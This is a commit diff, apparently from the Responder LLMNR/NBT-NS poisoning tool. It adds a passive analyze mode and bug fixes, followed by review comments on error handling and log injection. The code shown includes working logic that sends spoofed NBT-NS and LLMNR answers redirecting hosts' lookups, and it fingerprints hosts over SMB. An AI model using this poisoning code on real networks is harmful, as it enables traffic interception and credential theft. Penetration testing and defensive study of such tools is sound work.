Added: Analyze stealth mode. See all traffic, but dont answer (-A cli). Minor bugs also fixed.

lgandx 2014-01-29 19:14:25 -05:00
parent bf2fdf083c
commit 9bb2f81044
2 changed files with 173 additions and 68 deletions


@ -15,7 +15,7 @@
# #
# You should have received a copy of the GNU General Public License # You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>. # along with this program. If not, see <http://www.gnu.org/licenses/>.
import re,sys,socket,struct import re,sys,socket,struct,string
from socket import * from socket import *
from odict import OrderedDict from odict import OrderedDict
@ -101,13 +101,14 @@ class SMBSessionFingerData(Packet):
def OsNameClientVersion(data): def OsNameClientVersion(data):
lenght = struct.unpack('<H',data[43:45])[0] try:
pack = tuple(data[47+lenght:].split('\x00\x00\x00'))[:2] lenght = struct.unpack('<H',data[43:45])[0]
var = [e.replace('\x00','') for e in data[47+lenght:].split('\x00\x00\x00')[:2]] pack = tuple(data[47+lenght:].split('\x00\x00\x00'))[:2]
OsVersion, ClientVersion = tuple(var) var = [e.replace('\x00','') for e in data[47+lenght:].split('\x00\x00\x00')[:2]]
print "[+] Os version is:",OsVersion OsVersion, ClientVersion = tuple(var)
print "[+] ClientVersion is:", ClientVersion return OsVersion, ClientVersion
return OsVersion, ClientVersion except:
return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
def RunSmbFinger(host): def RunSmbFinger(host):
s = socket(AF_INET, SOCK_STREAM) s = socket(AF_INET, SOCK_STREAM)
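Review bot: The bare `except:` added to `OsNameClientVersion` catches everything, including KeyboardInterrupt, and returns two sentence strings in the slots where a caller expects the OS and client version, so a parse failure on attacker-supplied SMB data cannot be told apart from a real result. The visible body can fail only in `struct.unpack` (short `data`) and in the two-value unpacking of `var`, so `except (struct.error, ValueError):` is enough. `pack` is assigned and never used, and the newly imported `string` has no use in the lines shown here. `RunSmbFinger` continues outside this section.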


@ -16,7 +16,7 @@
# You should have received a copy of the GNU General Public License # You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>. # along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys,struct,SocketServer,re,optparse,socket,thread,Fingerprint,random,os,ConfigParser,BaseHTTPServer, select,urlparse,zlib import sys,struct,SocketServer,re,optparse,socket,thread,Fingerprint,random,os,ConfigParser,BaseHTTPServer, select,urlparse,zlib, string
from SocketServer import TCPServer, UDPServer, ThreadingMixIn, StreamRequestHandler, BaseRequestHandler,BaseServer from SocketServer import TCPServer, UDPServer, ThreadingMixIn, StreamRequestHandler, BaseRequestHandler,BaseServer
from Fingerprint import RunSmbFinger,OsNameClientVersion from Fingerprint import RunSmbFinger,OsNameClientVersion
from odict import OrderedDict from odict import OrderedDict
@ -26,6 +26,8 @@ from random import randrange
parser = optparse.OptionParser(usage='python %prog -i 10.20.30.40 -b On -r On', parser = optparse.OptionParser(usage='python %prog -i 10.20.30.40 -b On -r On',
prog=sys.argv[0], prog=sys.argv[0],
) )
parser.add_option('-A','--analyze', action="store_true", help="Analyze mode. This option allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning anything.", metavar="10.20.30.40",dest="Analyse")
parser.add_option('-i','--ip', action="store", help="The ip address to redirect the traffic to. (usually yours)", metavar="10.20.30.40",dest="OURIP") parser.add_option('-i','--ip', action="store", help="The ip address to redirect the traffic to. (usually yours)", metavar="10.20.30.40",dest="OURIP")
parser.add_option('-I','--interface', action="store", help="Network interface to use", metavar="eth0", dest="INTERFACE", default="Not set") parser.add_option('-I','--interface', action="store", help="Network interface to use", metavar="eth0", dest="INTERFACE", default="Not set")
@ -46,7 +48,7 @@ parser.add_option('-v',action="store_true", help="More verbose",dest="Verbose")
options, args = parser.parse_args() options, args = parser.parse_args()
if options.OURIP is None: if options.OURIP is None and options.Analyse is None:
print "-i mandatory option is missing\n" print "-i mandatory option is missing\n"
parser.print_help() parser.print_help()
exit(-1) exit(-1)
@ -86,6 +88,7 @@ Finger_On_Off = options.Finger.upper()
INTERFACE = options.INTERFACE INTERFACE = options.INTERFACE
Verbose = options.Verbose Verbose = options.Verbose
Force_WPAD_Auth = options.Force_WPAD_Auth.upper() Force_WPAD_Auth = options.Force_WPAD_Auth.upper()
AnalyzeMode = options.Analyse
if INTERFACE != "Not set": if INTERFACE != "Not set":
BIND_TO_Interface = INTERFACE BIND_TO_Interface = INTERFACE
@ -114,6 +117,12 @@ def OsInterfaceIsSupported(INTERFACE):
if INTERFACE == "Not set": if INTERFACE == "Not set":
return False return False
def Analyze(AnalyzeMode):
if AnalyzeMode == True:
return True
else:
return False
#Logger #Logger
import logging import logging
logging.basicConfig(filename=str(os.path.join(ResponderPATH,SessionLog)),level=logging.INFO,format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p') logging.basicConfig(filename=str(os.path.join(ResponderPATH,SessionLog)),level=logging.INFO,format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
@ -123,6 +132,10 @@ Log2Filename = str(os.path.join(ResponderPATH,"LLMNR-NBT-NS.log"))
logger2 = logging.getLogger('LLMNR/NBT-NS') logger2 = logging.getLogger('LLMNR/NBT-NS')
logger2.addHandler(logging.FileHandler(Log2Filename,'w')) logger2.addHandler(logging.FileHandler(Log2Filename,'w'))
AnalyzeFilename = str(os.path.join(ResponderPATH,"Analyze-LLMNR-NBT-NS.log"))
logger3 = logging.getLogger('Analyze LLMNR/NBT-NS')
logger3.addHandler(logging.FileHandler(AnalyzeFilename,'w'))
def Show_Help(ExtraHelpData): def Show_Help(ExtraHelpData):
help = "NBT Name Service/LLMNR Responder 2.0.\nPlease send bugs/comments to: lgaffie@trustwave.com\nTo kill this script hit CRTL-C\n\n" help = "NBT Name Service/LLMNR Responder 2.0.\nPlease send bugs/comments to: lgaffie@trustwave.com\nTo kill this script hit CRTL-C\n\n"
help+= ExtraHelpData help+= ExtraHelpData
@ -140,7 +153,7 @@ def WriteData(outfile,data, user):
if re.search(user.encode('hex'), filestr.read().encode('hex')): if re.search(user.encode('hex'), filestr.read().encode('hex')):
filestr.close() filestr.close()
return False return False
if re.search("\$", user): if re.search(re.escape("$"), user):
filestr.close() filestr.close()
return False return False
else: else:
@ -157,7 +170,7 @@ def PrintData(outfile,user):
if re.search(user.encode('hex'), filestr.read().encode('hex')): if re.search(user.encode('hex'), filestr.read().encode('hex')):
filestr.close() filestr.close()
return False return False
if re.search("\$", user): if re.search(re.escape("$"), user):
filestr.close() filestr.close()
return False return False
else: else:
@ -170,7 +183,7 @@ def PrintLLMNRNBTNS(outfile,Message):
return True return True
if os.path.isfile(outfile) == True: if os.path.isfile(outfile) == True:
with open(outfile,"r") as filestr: with open(outfile,"r") as filestr:
if re.search(Message, filestr.read()): if re.search(re.escape(Message), filestr.read()):
filestr.close() filestr.close()
return False return False
else: else:
@ -186,10 +199,8 @@ for i in range(0,len(NumChal),2):
Show_Help("[+]NBT-NS & LLMNR responder started\n[+]Loading Responder.conf File..\nGlobal Parameters set:\nResponder is bound to this interface:%s\nChallenge set is:%s\nWPAD Proxy Server is:%s\nWPAD script loaded:%s\nHTTP Server is:%s\nHTTPS Server is:%s\nSMB Server is:%s\nSMB LM support is set to:%s\nSQL Server is:%s\nFTP Server is:%s\nIMAP Server is:%s\nPOP3 Server is:%s\nSMTP Server is:%s\nDNS Server is:%s\nLDAP Server is:%s\nFingerPrint Module is:%s\nServing Executable via HTTP&WPAD is:%s\nAlways Serving a Specific File via HTTP&WPAD is:%s\n\n"%(BIND_TO_Interface, NumChal,WPAD_On_Off,WPAD_Script,On_Off,SSL_On_Off,SMB_On_Off,LM_On_Off,SQL_On_Off,FTP_On_Off,IMAP_On_Off,POP_On_Off,SMTP_On_Off,DNS_On_Off,LDAP_On_Off,Finger_On_Off,Exe_On_Off,Exec_Mode_On_Off)) Show_Help("[+]NBT-NS & LLMNR responder started\n[+]Loading Responder.conf File..\nGlobal Parameters set:\nResponder is bound to this interface:%s\nChallenge set is:%s\nWPAD Proxy Server is:%s\nWPAD script loaded:%s\nHTTP Server is:%s\nHTTPS Server is:%s\nSMB Server is:%s\nSMB LM support is set to:%s\nSQL Server is:%s\nFTP Server is:%s\nIMAP Server is:%s\nPOP3 Server is:%s\nSMTP Server is:%s\nDNS Server is:%s\nLDAP Server is:%s\nFingerPrint Module is:%s\nServing Executable via HTTP&WPAD is:%s\nAlways Serving a Specific File via HTTP&WPAD is:%s\n\n"%(BIND_TO_Interface, NumChal,WPAD_On_Off,WPAD_Script,On_Off,SSL_On_Off,SMB_On_Off,LM_On_Off,SQL_On_Off,FTP_On_Off,IMAP_On_Off,POP_On_Off,SMTP_On_Off,DNS_On_Off,LDAP_On_Off,Finger_On_Off,Exe_On_Off,Exec_Mode_On_Off))
#Simple NBNS Services. if AnalyzeMode:
W_REDIRECT = "\x41\x41\x00" print '[+]Responder is in analyze mode. No NBT-NS/LLMNR requests will be poisoned.\n'
FILE_SERVER = "\x43\x41\x00"
#Packet class handling all packet generation (see odict.py). #Packet class handling all packet generation (see odict.py).
class Packet(): class Packet():
@ -252,12 +263,31 @@ class NBT_Ans(Packet):
self.fields["NbtName"] = data[12:46] self.fields["NbtName"] = data[12:46]
self.fields["IP"] = inet_aton(OURIP) self.fields["IP"] = inet_aton(OURIP)
def NBT_NS_Role(data):
Role = {
"\x41\x41\x00":"Workstation/Redirector Service",
"\x42\x4c\x00":"Domain Master Browser. This name is likely a domain controller if any, according to MSFT specs.)",
"\x42\x4d\x00":"Domain controller service. This name is a domain controller.",
"\x42\x4e\x00":"Local Master Browser",
"\x42\x4f\x00":"Browser Election Service.",
"\x43\x41\x00":"File Server Service",
"\x41\x42\x00":"Browser Service",
}
if data in Role:
return Role[data]
else:
return "Service not known."
# Define what are we answering to. # Define what are we answering to.
def Validate_NBT_NS(data,Wredirect): def Validate_NBT_NS(data,Wredirect):
if FILE_SERVER == data[43:46]: if Analyze(AnalyzeMode):
#print NBT_NS_Role(data[43:46])
return False
if NBT_NS_Role(data[43:46]) == "File Server Service":
return True return True
if Wredirect == "ON": if Wredirect == "ON":
if W_REDIRECT == data[43:46]: if NBT_NS_Role(data[43:46]) == "Workstation/Redirector Service":
return True return True
else: else:
return False return False
@ -271,7 +301,7 @@ def Decode_Name(nbname):
for i in range(0, 32, 2): for i in range(0, 32, 2):
l.append(chr(((ord(nbname[i]) - 0x41) << 4) | l.append(chr(((ord(nbname[i]) - 0x41) << 4) |
((ord(nbname[i+1]) - 0x41) & 0xf))) ((ord(nbname[i+1]) - 0x41) & 0xf)))
return ''.join(l).split('\x00', 1)[0].strip() return filter(lambda x: x in string.printable, ''.join(l).split('\x00', 1)[0].replace(' ', ''))
except: except:
return "Illegal NetBIOS name" return "Illegal NetBIOS name"
@ -282,7 +312,26 @@ class NB(BaseRequestHandler):
request, socket = self.request request, socket = self.request
data = request data = request
Name = Decode_Name(data[13:45]) Name = Decode_Name(data[13:45])
if RespondToSpecificHost(RespondTo):
if Analyze(AnalyzeMode):
if data[2:4] == "\x01\x10":
if Is_Finger_On(Finger_On_Off):
try:
Finger = RunSmbFinger((self.client_address[0],445))
Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s.\nOs Version is: %s Client Version is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46]),Finger[0],Finger[1])
logger3.warning(Message)
except Exception:
Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s\n"%(self.client_address[0], Name,NBT_NS_Role(data[43:46]))
logger3.warning(Message)
if PrintLLMNRNBTNS(AnalyzeFilename,Message):
print Message
else:
Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46]))
if PrintLLMNRNBTNS(AnalyzeFilename,Message):
print Message
logger3.warning(Message)
if RespondToSpecificHost(RespondTo) and Analyze(AnalyzeMode) == False:
if RespondToIPScope(RespondTo, self.client_address[0]): if RespondToIPScope(RespondTo, self.client_address[0]):
if data[2:4] == "\x01\x10": if data[2:4] == "\x01\x10":
if Validate_NBT_NS(data,Wredirect): if Validate_NBT_NS(data,Wredirect):
@ -290,7 +339,7 @@ class NB(BaseRequestHandler):
buff.calculate(data) buff.calculate(data)
for x in range(1): for x in range(1):
socket.sendto(str(buff), self.client_address) socket.sendto(str(buff), self.client_address)
Message = 'NBT-NS Answer sent to: %s. The requested name was : %s.'%(self.client_address[0], Name) Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name)
logging.warning(Message) logging.warning(Message)
if PrintLLMNRNBTNS(Log2Filename,Message): if PrintLLMNRNBTNS(Log2Filename,Message):
print Message print Message
@ -298,6 +347,8 @@ class NB(BaseRequestHandler):
if Is_Finger_On(Finger_On_Off): if Is_Finger_On(Finger_On_Off):
try: try:
Finger = RunSmbFinger((self.client_address[0],445)) Finger = RunSmbFinger((self.client_address[0],445))
print '[+] OsVersion is:%s'%(Finger[0])
print '[+] ClientVersion is :%s'%(Finger[1])
logging.warning('[+] OsVersion is:%s'%(Finger[0])) logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('[+] ClientVersion is :%s'%(Finger[1])) logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception: except Exception:
@ -308,12 +359,12 @@ class NB(BaseRequestHandler):
else: else:
if data[2:4] == "\x01\x10": if data[2:4] == "\x01\x10":
if Validate_NBT_NS(data,Wredirect): if Validate_NBT_NS(data,Wredirect) and Analyze(AnalyzeMode) == False:
buff = NBT_Ans() buff = NBT_Ans()
buff.calculate(data) buff.calculate(data)
for x in range(1): for x in range(1):
socket.sendto(str(buff), self.client_address) socket.sendto(str(buff), self.client_address)
Message = 'NBT-NS Answer sent to: %s. The requested name was : %s.'%(self.client_address[0], Name) Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name)
logging.warning(Message) logging.warning(Message)
if PrintLLMNRNBTNS(Log2Filename,Message): if PrintLLMNRNBTNS(Log2Filename,Message):
print Message print Message
@ -321,6 +372,8 @@ class NB(BaseRequestHandler):
if Is_Finger_On(Finger_On_Off): if Is_Finger_On(Finger_On_Off):
try: try:
Finger = RunSmbFinger((self.client_address[0],445)) Finger = RunSmbFinger((self.client_address[0],445))
print '[+] OsVersion is:%s'%(Finger[0])
print '[+] ClientVersion is :%s'%(Finger[1])
logging.warning('[+] OsVersion is:%s'%(Finger[0])) logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('[+] ClientVersion is :%s'%(Finger[1])) logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception: except Exception:
@ -330,34 +383,55 @@ class NB(BaseRequestHandler):
################################################################################## ##################################################################################
#Browser Listener #Browser Listener
################################################################################## ##################################################################################
def FindPDC(data,Client): def BecomeBackup(data,Client):
DataOffset = struct.unpack('<H',data[139:141])[0] DataOffset = struct.unpack('<H',data[139:141])[0]
BrowserPacket = data[82+DataOffset:] BrowserPacket = data[82+DataOffset:]
if BrowserPacket[0] == "\x0c": if BrowserPacket[0] == "\x0b":
Domain = ''.join(tuple(BrowserPacket[6:].split('\x00'))[:1]) ServerName = BrowserPacket[1:]
if Domain == "WORKGROUP": if Is_Finger_On(Finger_On_Off):
print "[Browser]Received announcement for Workgroup.. ignoring" try:
elif Domain == "MSHOME": Finger = RunSmbFinger((self.client_address[0],445))
print "[Browser]Received announcement for MSHOME.. ignoring" Message = "[Analyze mode: Browser]Datagram Request from IP: %s hostname: %s via the: %s wants to become a backup browser (Local Master Browser backup) on this domain: %s.\nOs Version is: %s Client Version is: %s"%(Client, Decode_Name(data[15:47]),NBT_NS_Role(data[45:48]),Decode_Name(data[49:81]),Finger[0],Finger[1])
logger3.warning(Message)
except Exception:
Message = "[Analyze mode: Browser]Datagram Request from IP: %s hostname: %s via the: %s wants to become a backup browser (Local Master Browser backup) on this domain: %s."%(Client, Decode_Name(data[15:47]),NBT_NS_Role(data[45:48]),Decode_Name(data[49:81]))
logger3.warning(Message)
else: else:
print "[Browser]PDC ip address is: ",Client Message = "[Analyze mode: Browser]Datagram Request from IP: %s hostname: %s via the: %s wants to become a backup browser (Local Master Browser backup) on this domain: %s."%(Client, Decode_Name(data[15:47]),NBT_NS_Role(data[45:48]),Decode_Name(data[49:81]))
logging.warning('[Browser] PDC ip address is: %s'%(Client)) if PrintLLMNRNBTNS(AnalyzeFilename,Message):
print "[Browser]PDC Domain Name is: ", Domain print Message
logging.warning('[Browser]PDC Domain Name is: %s'%(Domain)) logger3.warning(Message)
ServerName = BrowserPacket[6+16+10:]
print "[Browser]PDC Machine Name is: ", ServerName.replace("\x00","")
logging.warning('[Browser]PDC Machine Name is: %s'%(ServerName.replace("\x00","")))
else: else:
pass pass
def ParseDatagramNBTNames(data,Client):
if Is_Finger_On(Finger_On_Off):
try:
Finger = RunSmbFinger((Client,445))
Message = '[Analyze mode: Browser]Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s\nOs Version is: %s Client Version is: %s'%(Client, Decode_Name(data[15:47]),NBT_NS_Role(data[45:48]),Decode_Name(data[49:81]), NBT_NS_Role(data[79:82]),Finger[0],Finger[1])
logger3.warning(Message)
except Exception:
Message = '[Analyze mode: Browser]Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s'%(Client, Decode_Name(data[15:47]),NBT_NS_Role(data[45:48]),Decode_Name(data[49:81]), NBT_NS_Role(data[79:82]))
logger3.warning(Message)
if PrintLLMNRNBTNS(AnalyzeFilename,Message):
print Message
else:
Message = '[Analyze mode: Browser]Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s'%(Client, Decode_Name(data[15:47]),NBT_NS_Role(data[45:48]),Decode_Name(data[49:81]), NBT_NS_Role(data[79:82]))
logger3.warning(Message)
if PrintLLMNRNBTNS(AnalyzeFilename,Message):
print Message
class Browser(BaseRequestHandler): class Browser(BaseRequestHandler):
def handle(self): def handle(self):
try: try:
request, socket = self.request request, socket = self.request
FindPDC(request,self.client_address[0]) if Analyze(AnalyzeMode):
ParseDatagramNBTNames(request,self.client_address[0])
BecomeBackup(request,self.client_address[0])
BecomeBackup(request,self.client_address[0])
except Exception: except Exception:
pass raise
################################################################################## ##################################################################################
#SMB Server #SMB Server
################################################################################## ##################################################################################
@ -821,11 +895,14 @@ def Parse_LLMNR_Name(data,addr):
return Name return Name
def Parse_IPV6_Addr(data): def Parse_IPV6_Addr(data):
Len = len(data) if data[len(data)-4:len(data)][1] =="\x1c":
if data[Len-4:Len][1] =="\x1c":
return False return False
else: if data[len(data)-4:len(data)] == "\x00\x01\x00\x01":
return True return True
if data[len(data)-4:len(data)] == "\x00\xff\x00\x01":
return True
else:
return False
def FindLocalIP(Iface): def FindLocalIP(Iface):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
@ -838,12 +915,12 @@ def RunLLMNR():
ALL = '0.0.0.0' ALL = '0.0.0.0'
MADDR = "224.0.0.252" MADDR = "224.0.0.252"
MPORT = 5355 MPORT = 5355
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
if IsOsX(): if IsOsX():
print "OsX Bind to interface is not supported..Listening on all interfaces." print "OsX Bind to interface is not supported..Listening on all interfaces."
if OsInterfaceIsSupported(INTERFACE): if OsInterfaceIsSupported(INTERFACE):
try: try:
IP = FindLocalIP(BIND_TO_Interface) IP = FindLocalIP(BIND_TO_Interface)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
s.setsockopt(socket.SOL_SOCKET, 25, BIND_TO_Interface+'\0') s.setsockopt(socket.SOL_SOCKET, 25, BIND_TO_Interface+'\0')
s.bind((ALL,MPORT)) s.bind((ALL,MPORT))
s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1) s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
@ -854,6 +931,7 @@ def RunLLMNR():
sys.exit(1) sys.exit(1)
else: else:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1) s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
s.bind((ALL,MPORT)) s.bind((ALL,MPORT))
s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255) s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
@ -863,48 +941,74 @@ def RunLLMNR():
while True: while True:
try: try:
data, addr = s.recvfrom(1024) data, addr = s.recvfrom(1024)
if Analyze(AnalyzeMode):
if data[2:4] == "\x00\x00":
if Parse_IPV6_Addr(data):
Name = Parse_LLMNR_Name(data,addr)
if Is_Finger_On(Finger_On_Off):
try:
Finger = RunSmbFinger((addr[0],445))
Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s.\nOs Version is: %s Client Version is: %s"%(addr[0], Name,Finger[0],Finger[1])
logger3.warning(Message)
except Exception:
Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s."%(addr[0], Name)
logger3.warning(Message)
if PrintLLMNRNBTNS(AnalyzeFilename,Message):
print Message
else:
Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s."%(addr[0], Name)
if PrintLLMNRNBTNS(AnalyzeFilename,Message):
print Message
logger3.warning(Message)
if RespondToSpecificHost(RespondTo): if RespondToSpecificHost(RespondTo):
if RespondToIPScope(RespondTo, addr[0]): if Analyze(AnalyzeMode) == False:
if data[2:4] == "\x00\x00": if RespondToIPScope(RespondTo, addr[0]):
if data[2:4] == "\x00\x00":
if Parse_IPV6_Addr(data):
Name = Parse_LLMNR_Name(data,addr)
buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
buff.calculate()
for x in range(1):
s.sendto(str(buff), addr)
Message = "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(addr[0],Name)
logging.warning(Message)
if PrintLLMNRNBTNS(Log2Filename,Message):
print Message
logger2.warning(Message)
if Is_Finger_On(Finger_On_Off):
try:
Finger = RunSmbFinger((addr[0],445))
print '[+] OsVersion is:%s'%(Finger[0])
print '[+] ClientVersion is :%s'%(Finger[1])
logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception:
logging.warning('[+] Fingerprint failed for host: %s'%(addr[0]))
pass
else:
if data[2:4] == "\x00\x00":
if Analyze(AnalyzeMode) == False:
if Parse_IPV6_Addr(data): if Parse_IPV6_Addr(data):
Name = Parse_LLMNR_Name(data,addr) Name = Parse_LLMNR_Name(data,addr)
buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name) buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
buff.calculate() buff.calculate()
Message = "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(addr[0],Name)
for x in range(1): for x in range(1):
s.sendto(str(buff), addr) s.sendto(str(buff), addr)
Message = "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(addr[0],Name)
logging.warning(Message)
if PrintLLMNRNBTNS(Log2Filename,Message): if PrintLLMNRNBTNS(Log2Filename,Message):
print Message print Message
logger2.warning(Message) logger2.warning(Message)
if Is_Finger_On(Finger_On_Off): if Is_Finger_On(Finger_On_Off):
try: try:
Finger = RunSmbFinger((addr[0],445)) Finger = RunSmbFinger((addr[0],445))
print '[+] OsVersion is:%s'%(Finger[0])
print '[+] ClientVersion is :%s'%(Finger[1])
logging.warning('[+] OsVersion is:%s'%(Finger[0])) logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('[+] ClientVersion is :%s'%(Finger[1])) logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception: except Exception:
logging.warning('[+] Fingerprint failed for host: %s'%(addr[0])) logging.warning('[+] Fingerprint failed for host: %s'%(addr[0]))
pass pass
else:
if data[2:4] == "\x00\x00":
if Parse_IPV6_Addr(data):
Name = Parse_LLMNR_Name(data,addr)
buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
buff.calculate()
Message = "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(addr[0],Name)
for x in range(1):
s.sendto(str(buff), addr)
if PrintLLMNRNBTNS(Log2Filename,Message):
print Message
logger2.warning(Message)
if Is_Finger_On(Finger_On_Off):
try:
Finger = RunSmbFinger((addr[0],445))
logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception:
logging.warning('[+] Fingerprint failed for host: %s'%(addr[0]))
pass
except: except:
raise raise
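Review bot: In `BecomeBackup(data,Client)` the fingerprint call reads `self.client_address[0]`, but this is a module-level function with no `self`, so the lookup raises NameError, the `except Exception` right after it absorbs the error, and the message carrying OS and client version is never produced. Use the parameter, as `ParseDatagramNBTNames` already does: `Finger = RunSmbFinger((Client,445))`. Separately, `Decode_Name` now filters on `string.printable`, which still admits `\n`, `\r` and `\t`; the decoded name comes from the network and is formatted straight into the log messages, so one request can be spread over several forged-looking log lines. Filtering on `string.ascii_letters + string.digits + string.punctuation` would keep each entry on one line. Indentation is lost on this page, so the nesting around the `except` is inferred.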